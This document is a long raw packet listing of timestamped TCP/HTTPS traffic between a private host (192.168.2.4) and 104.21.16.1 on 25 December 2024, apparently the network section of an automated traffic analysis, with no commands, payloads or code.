                                                                                                                                  Dec 25, 2024 15:09:10.952724934 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.952775955 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.952819109 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.956304073 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.956374884 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.956446886 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.956499100 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.956558943 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.956609011 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.959198952 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.959254026 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.959392071 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.959440947 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.960813999 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.960877895 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.961374044 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.961453915 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.962272882 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.962333918 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.963238955 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.963295937 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.964042902 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.964113951 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.964912891 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.964972019 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.965756893 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.965817928 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.966723919 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.966790915 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.967719078 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.967789888 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.969425917 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.969482899 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.971265078 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.971369028 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.038822889 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.038928032 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.039645910 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.039707899 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.041383028 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.041440964 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.042367935 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.042424917 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.044095039 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.044182062 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.086150885 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.086221933 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.087522984 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.087590933 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.125766039 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.125840902 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.126880884 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.126948118 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.127831936 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.127916098 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.129375935 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.129916906 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.130361080 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.130425930 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.131200075 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.131263971 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.135515928 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.135565042 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.135592937 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.135603905 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.135627985 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.137142897 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.137201071 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.137211084 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.140693903 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.140732050 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.140753031 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.140762091 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.140789032 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.142417908 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.142478943 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.142487049 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.142535925 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.143341064 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.143397093 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.144644976 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.144706011 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.146262884 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.146327019 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.147056103 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.147124052 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.148802042 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.148870945 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.149409056 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.149470091 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.150810003 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.150873899 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.152164936 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.152236938 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.153145075 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.153211117 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.154661894 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.154726028 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.155530930 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.155596972 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.155651093 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.157282114 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.157344103 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.157356024 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.157398939 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.158178091 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.158240080 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.159917116 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.159980059 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.160670042 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.160732031 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.161669970 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.161735058 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.230799913 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.230873108 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.232150078 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.232218981 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.233057976 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.233114004 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.234628916 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.234690905 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.278424978 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.278490067 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.280153990 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.280220032 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.318144083 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.318212986 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.319670916 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.319737911 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.321296930 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.321367979 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.322238922 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.322302103 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.323928118 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.323992014 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.325421095 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.325468063 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.329605103 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.329646111 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.329667091 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.329675913 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.329705000 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.329721928 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.331310987 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.331379890 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.332946062 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.333012104 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.334517002 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.334583044 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.336191893 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.336271048 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.337078094 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.337213039 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.337909937 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.337966919 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.338776112 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.338829994 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.341171980 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.341243982 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.342765093 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.342828035 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.344153881 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.344218969 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.344943047 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.345005989 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.345766068 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.345825911 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.347428083 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.347480059 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.348287106 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.348335028 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.349885941 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.349948883 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.351495981 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.351552010 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.422899008 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.423002005 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.424071074 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.424139023 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.425713062 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.425776005 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.427306890 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.427373886 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.470737934 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.470805883 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.509735107 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.509816885 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.510900021 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.510972023 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.512242079 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.512306929 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.512350082 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.512399912 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.513941050 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.514003992 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.515561104 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.515628099 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.517079115 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.517143965 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.522789955 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.522836924 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.522878885 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.522891998 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.522918940 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.522938967 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.527523041 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.527566910 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.527612925 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.527621984 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.527679920 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.529022932 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.529079914 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.529088974 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.529866934 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.529918909 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.529927015 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.529977083 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.530740976 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.530802011 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.531578064 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.531632900 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.533046961 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.533111095 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.535031080 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.535087109 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.537487984 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.537556887 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.538531065 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.538585901 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.539952040 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.540007114 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.543061972 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.543123960 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.543132067 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.543168068 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.615565062 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.615648031 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.617199898 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.617281914 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.618150949 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.618221045 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.618947029 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.619014025 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.664772987 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.665132999 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.666559935 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.666702032 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.702460051 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.702543974 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.704194069 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.704327106 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.705972910 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.706267118 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.708112955 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.709050894 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.709691048 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.709765911 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.710578918 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.711170912 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.711513996 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.711626053 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.713058949 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.713165998 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.714631081 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.715126991 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.715346098 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.715547085 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.717039108 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.717149973 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.718533993 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.718770027 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.719300985 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.719554901 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.720124006 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.720254898 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.721019030 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.721194029 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.723326921 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.723428011 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.725068092 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.725655079 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.727025032 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.727121115 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.728652000 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.728796005 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.730202913 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.731018066 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.731412888 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.731430054 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.732539892 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.733438969 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.733967066 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.733978987 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.734235048 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.734265089 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.734272003 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.735028982 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.735059023 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.735070944 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.736512899 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.807177067 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.807497025 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.808398962 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.809201956 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:11.810688019 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:11.811888933 CET49734443192.168.2.4104.21.16.1
